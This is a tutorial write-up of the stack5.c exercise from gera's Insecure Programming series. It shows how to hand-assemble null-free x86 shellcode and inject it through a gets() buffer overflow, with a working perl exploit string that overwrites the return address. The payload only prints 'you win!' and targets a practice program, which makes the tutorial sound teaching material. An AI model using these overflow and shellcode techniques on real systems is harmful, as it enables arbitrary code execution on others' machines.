Insecure Programming by Example: shellcode & stack5.c

Introduction

Now it’s time for Insecure Programming by Example exercise stack5.c, and in the interest of brevity I’ll just go ahead and post the damned thing.

/* stack5-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
        int cookie;
        char buf[80];

        printf("buf: %08x cookie: %08x\n", &buf, &cookie);
        gets(buf);

        if (cookie == 0x000d0a00)
                printf("you loose!\n");
}

So, what’s new in this version…oh wait, if we set the cookie correctly, it prints out “you loose!”…so what the heck are we supposed to do now?

The answer lies with shellcode. Basically, we are given a buffer to work with, and we need to put instructions directly in the buffer in the form of raw bytes, and then redirect execution to a point where our shellcode will run by overwriting the saved return address on the stack with an address inside that buffer. That’s pretty much it. The concept should be pretty familiar at this point, and as you’ll see, the execution is not so hard.

Epic Sploits

It’s worth mentioning that these programs are purposely designed to be exploited, and the techniques we are using are among the most basic when it comes to this sort of thing. Though I have no professional experience in this line of work, it cannot all be this straightforward. If you want an example of something truly advanced, explained so even I can grasp the basics, I’d go check out Thomas Ptacek’s write-up of Mark Dowd’s Flash NULL pointer exploit. It gives us a glimpse into what the truly advanced techniques look like, and Thomas does an excellent job of explaining not only how it works (generally) but why it’s such a big deal.

So if I act like I know what I’m talking about, just understand that this is a very useful foundation that we are building together, and if you have enjoyed yourself so far, you will not be bored, because there will be plenty of work to do.

Shellc0dage

There are many ways we can attack the problem of developing the shellcode and making it available to the process to be executed. Thanks to the Internet, there are very many resources where sample shellcode for all sorts of different systems can be referenced or even automatically generated. But in this brief article I’ll take you through the manual generation of shellcode and then the process of getting it to run on the vulnerable program step-by-step. Hacking: The Art of Exploitation‘s chapter on shellcode was heavily used as a reference for my original solution (which I can no longer remember), and I’m sure I’ll go back there for more looks in the course of writing this post.

Abstractions of Abstractions

NOTE: This is an area I’m still learning a lot about. If I gloss over something to the point that it’s incorrect or inaccurate, please let me know and I’ll fix it.

So, let’s talk real quick about the difference between instructions, system calls, and C library functions or calls. Essentially, at the lowest level you have x86 assembly instructions, like push, pop, call, mov, and ret. These instructions are hard-coded into the logic of the processor, and though the implementation of them in actual transistor logic may change, you generally won’t see the interface to the instruction change at all (for instance, the number or type of arguments it takes). The list of instructions (and of course the registers) that a processor supports is essentially what makes a processor x86-compatible.

NOTE: in the course of doing research for this article, it seems like the system call wrappers and the C library functions are typically both implemented via libc, or in the libc project/package/whatever. The distinction between the two I’m observing here is still valid, because they are used in two completely different ways, and each belongs to a different set of standards. I’d think of them as two sides of the same coin, but I’m sure that analogy breaks down at some point, as all do.

The next layer up is kernel system calls. System calls are requests that a process makes to the kernel to “do stuff” with the given arguments; the C-callable wrappers around them live in a system library (libc, typically in /lib). They are not inherent to the x86 processor; rather, they are inherent to the kernel and operating system that you are using at the time. The kernel code behind them is mostly written in C with a little assembly at the entry points (I suppose everything becomes machine instructions eventually), and their purpose (along with the entire kernel, really) is to provide a standardized interface to the hardware of the system. Any time you print something to the screen, type something, use your microphone to record something, or listen to music through your headphones, you are using the standard resources provided by the kernel and the kernel’s system calls to do so. For the curious, we have not yet made any system calls directly (only through further-up abstractions such as printf(), which we’ll talk about next), but we will make extensive use of them when we write our shellcode.

The final and highest layer of abstraction we’ll deal with is the C standard library functions, declared in the various header files located typically in /usr/include on your average Linux distribution and implemented in libc. The C standard library is defined through an ISO standard, and each operating system that wants to use C capabilities past what the compiler provides (as an interface to assembly instructions for allocating and managing memory) in a way consistent with other operating systems or kernels needs to implement the standard functions the library defines. Every time you use #include <stdio.h> to call printf(), or #include <string.h> to call strcpy(), you are using functions defined by the ISO standard for C and implemented in libc, which is mapped into the memory of every process that links against it.

Oh boy, this section sure does gloss over quite a bit that might be worth mentioning. I’m sure it will come up at some point later on. In the meantime, if you want to do some extracurricular reading, a great reference, perhaps the only one you’ll ever need, is Advanced Programming in the UNIX Environment by W. Richard Stevens and Stephen Rago. It’s a bit above my head, but it will serve you well if you ever need to look something up…ever. If you want a gentler introduction that is very outdated but still quite informative and fun to read, I’d recommend The UNIX Programming Environment by Brian Kernighan and Rob Pike; I read this book and really liked it.

Enough Edumacation, Let’s Break Shit

Now I’m going to briefly outline how to build the shellcode we’re going to use, and then briefly talk about some quick optimizations you can do to get rid of null bytes and wasted space in the shellcode. Null bytes are not a problem for gets(), which only stops at a newline, but if you use something like strcpy() or another function that works on null-terminated strings to get your shellcode into memory, the first null byte will end the copy prematurely.

We are going to use the write() system call for Linux to actually print out our string. I guess that there are others that are available to print output to a file descriptor (STDOUT in our case), and I was hoping to find where printf() or puts() from the C standard library directly referenced the write() system call to satisfy personal curiosity, but couldn’t.

Assembly code can be written using mnemonics, which are basically English-like names that correspond directly to the numeric opcodes (one or more bytes each) that make up the actual machine language the processor understands. Whenever we use push or something like it with an argument after it, or whenever we see it in the output of objdump -D or another disassembler, we need to remember that it’s just another abstraction. The job of turning mnemonic instructions into actual machine language is that of the assembler. The assembler we’re going to use is a fairly standard and free one called the Netwide Assembler (nasm).

section .data  ; data segment
msg   db "you win!", 0x0a, 0x0d ; the string to print, followed by LF and CR bytes

section .text  ; text segment, where the code is
global _start  ; default entry point for ELF linking

_start:
; SYSCALL: ssize_t write(int fd, const void *buf, size_t count);
; Our syscall: write(1, msg, 10)
mov eax, 4  ; put 4 into EAX register, syscall write is #4 (/usr/include/asm-i386/unistd.h)
mov ebx, 1  ; put 1 into EBX, since file descriptor we want is STDOUT
mov ecx, msg   ; put the address of the string into ECX, since it's what we want to print
mov edx, 10 ; put 10 into EDX, since string is 10 bytes (with the LF and CR at the end)
int 0x80 ; tell the kernel to do a syscall

; SYSCALL: void _exit(int status);
; Our syscall: exit(0) meaning that there were no problems
mov eax, 1  ; put 1 into EAX since exit() is syscall #1
mov ebx, 0  ; put 0 into EBX, since that's our one and only argument to exit()
int 0x80 ; tell the kernel to do a syscall

The above code is an example of how one might write a program in assembly to print out “you win!”. The code is commented, and the comments explain each step. If we wanted to assemble this code into a proper ELF binary for Linux, we’d have to assemble the code into an object file with nasm, and then link the executable by running the ld command.

hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.asm
printyouwin.asm: ASCII English text
hacking@hacking-theart:~/InsecureProgramming $ nasm -f elf printyouwin.asm
hacking@hacking-theart:~/InsecureProgramming $ ls -la printyouwin.*
-rwxr--r-- 1 hacking hacking 651 2009-12-12 11:08 printyouwin.asm
-rw-r--r-- 1 hacking hacking 544 2009-12-12 11:09 printyouwin.o
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.o
printyouwin.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
hacking@hacking-theart:~/InsecureProgramming $ ld -o printyouwin printyouwin.o
ld: warning: cannot find entry symbol _start; defaulting to 0000000008048060
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin
printyouwin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
hacking@hacking-theart:~/InsecureProgramming $ ./printyouwin
you win!

This is all well and good. However, since our shellcode will run inside another already-started process, we can’t refer to the sections of our own executable to retrieve static values such as the string “you win!”, which has to be passed as an argument to the write() call: our .data segment, and the absolute address of msg that the linker baked into the mov instruction, simply won’t exist in the target. The other two arguments to write() are plain integers that we can load directly with mov instructions, so they are not an issue. But we need a way to get the address of our string into the ECX register, so write() will print it out for us. Enter the stack.

BITS 32             ;  Tell nasm this is 32-bit code.

  call mark_below   ;  Call below the string to instructions
  db "you win!",  0x0a, 0x0d  ; with newline and carriage return bytes.

mark_below:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  mov eax, 4        ; Write  syscall #.
  mov ebx, 1        ; STDOUT  file descriptor
  mov edx, 10       ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 10)

; void _exit(int status);
  mov eax, 1        ; Exit syscall #
  mov ebx, 0        ; Status = 0
  int 0x80          ; Do syscall:  exit(0)

This code uses a trick with the call instruction: call pushes the address of whatever follows it onto the stack as the return address, and here what follows it is our string. Immediately after the call, that address is popped back off the stack into the ECX register and used as a pointer to the string that we want to print.

We’ll want to translate this code not to the ELF format but to raw machine instructions, since we want to inject it into a running process. To do this, we’ll run nasm without the -f format option, so that it emits a flat binary. Then I’ll show you how many bytes the assembled shellcode takes up, and what it looks like when disassembled. Remember that, since we only have control of the 80-byte buffer, we only really have that many bytes to work with, give or take a few, so our shellcode cannot be too bloated.

hacking@hacking-theart:~/InsecureProgramming $ nasm -o printyouwin1 printyouwin1.asm
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin1*
printyouwin1:     data
printyouwin1.asm: ASCII English text
printyouwin1.o:   ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
hacking@hacking-theart:~/InsecureProgramming $ ls -l printyouwin1
-rw-r--r-- 1 hacking hacking 45 2009-12-12 11:57 printyouwin1
hacking@hacking-theart:~/InsecureProgramming $ wc -c printyouwin1
45 printyouwin1
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C printyouwin1
00000000  e8 0a 00 00 00 79 6f 75  20 77 69 6e 21 0a 0d 59  |.....you win!..Y|
00000010  b8 04 00 00 00 bb 01 00  00 00 ba 0a 00 00 00 cd  |................|
00000020  80 b8 01 00 00 00 bb 00  00 00 00 cd 80           |.............|
0000002d
hacking@hacking-theart:~/InsecureProgramming $ objdump -D printyouwin1
objdump: printyouwin1: File format not recognized
hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 printyouwin1
00000000  E80A000000        call 0xf
00000005  796F              jns 0x76
00000007  7520              jnz 0x29
00000009  7769              ja 0x74
0000000B  6E                outsb
0000000C  210A              and [edx],ecx
0000000E  0D59B80400        or eax,0x4b859
00000013  0000              add [eax],al
00000015  BB01000000        mov ebx,0x1
0000001A  BA0A000000        mov edx,0xa
0000001F  CD80              int 0x80
00000021  B801000000        mov eax,0x1
00000026  BB00000000        mov ebx,0x0
0000002B  CD80              int 0x80

This shellcode, while awesome, is not foolproof for many scenarios. If we are using the gets() function, we cannot include a newline (0x0a) anywhere in our input, because it will prematurely terminate gets(). If we are using other typical string-based functions such as strcpy(), the null bytes will kill us by prematurely terminating those functions as well. Here is a slimmed-down version of the shellcode that uses various techniques: writing to the low byte of a register (al, dl) after XORing the register against itself to zero out all 32 bits, smaller instructions such as jmp short to eliminate further null bytes, and calling back up into memory so that the negative, two’s complement displacement contains no null bytes. It also drops the trailing 0x0a and 0x0d newline and carriage return bytes from the string, since the 0x0a would end the gets() call prematurely.

BITS 32             ;  Tell nasm this is 32-bit code.

  jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  xor eax, eax      ; Zero  out full 32 bits of eax register.
  mov al, 4         ; Write  syscall #4 to the low byte of eax.
  xor ebx, ebx      ; Zero out ebx.
  inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
  xor edx, edx
  mov dl, 8         ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 8)

; void _exit(int status);
  mov al, 1        ; Exit syscall #1; eax holds write's return value (8), so its top 3 bytes are zero.
  dec ebx          ; Decrement ebx back down to 0 for status = 0.
  int 0x80         ; Do syscall: exit(0)

one:
  call two   ; Call back upwards to avoid null bytes
  db "you win!"  ; with no newline or carriage return bytes.

And here we are, assembling the code and then putting it into the buffer, prefixed with a NOP sled, where it executes successfully! You win!

hacking@hacking-theart:~/InsecureProgramming $ nasm -o stack5shellcode.out stack5shellcode.s
hacking@hacking-theart:~/InsecureProgramming $ md5sum stack5shellcode*
4c8c79ca6379f417c750f1712fbb5652  stack5shellcode
0f2668754e312f90cef8dff7f6c90723  stack5shellcode.bytes
4c8c79ca6379f417c750f1712fbb5652  stack5shellcode.out
bd6be6a87c2eee6e0fab27f13ba5853d  stack5shellcode.s
hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 stack5shellcode.out
00000000  EB13              jmp short 0x15
00000002  59                pop ecx
00000003  31C0              xor eax,eax
00000005  B004              mov al,0x4
00000007  31DB              xor ebx,ebx
00000009  43                inc ebx
0000000A  31D2              xor edx,edx
0000000C  B208              mov dl,0x8
0000000E  CD80              int 0x80
00000010  B001              mov al,0x1
00000012  4B                dec ebx
00000013  CD80              int 0x80
00000015  E8E8FFFFFF        call 0x2
0000001A  796F              jns 0x8b
0000001C  7520              jnz 0x3e
0000001E  7769              ja 0x89
00000020  6E                outsb
00000021  21                db 0x21
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C stack5shellcode.out
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
00000022
hacking@hacking-theart:~/InsecureProgramming $ perl -e 'print "\x90" x 74 . "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "\xb0\xf7\xff\xbf\n";' | ./stack5
buf: bffff7b0 cookie: bffff80c
you win!hacking@hacking-theart:~/InsecureProgramming $ 

I wanted to make sure that a NOP sled was an understood concept, but really we could have just as easily put the shellcode at the very beginning of the buffer, padded the rest with junk, and executed all the same.

root@hacking-theart:/home/hacking/InsecureProgramming # perl -e 'print "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "A" x 74 . "\x80\xf7\xff\xbf\n";' | ./stack5
buf: bffff780 cookie: bffff7dc
you win!root@hacking-theart:/home/hacking/InsecureProgramming #

And that (finally) wraps us up for the stackN.c series of stack buffer overflows designed and provided for free by gera of Core. I’ll probably never, ever write about these again; it was pretty laborious, but I hope you didn’t find reading about it so. I used a great many references while completing these write-ups, and I recommend them all, but if you can’t afford to go out and buy $500.00 worth of new books, you might want to check out the Safari Books Online site that O’Reilly offers, as it’s a pretty good deal (though less so now that they eliminated the 5-book shelf :-( ). The Internet and Google (and Bing!) are your friends as well. Go forth, and break things!
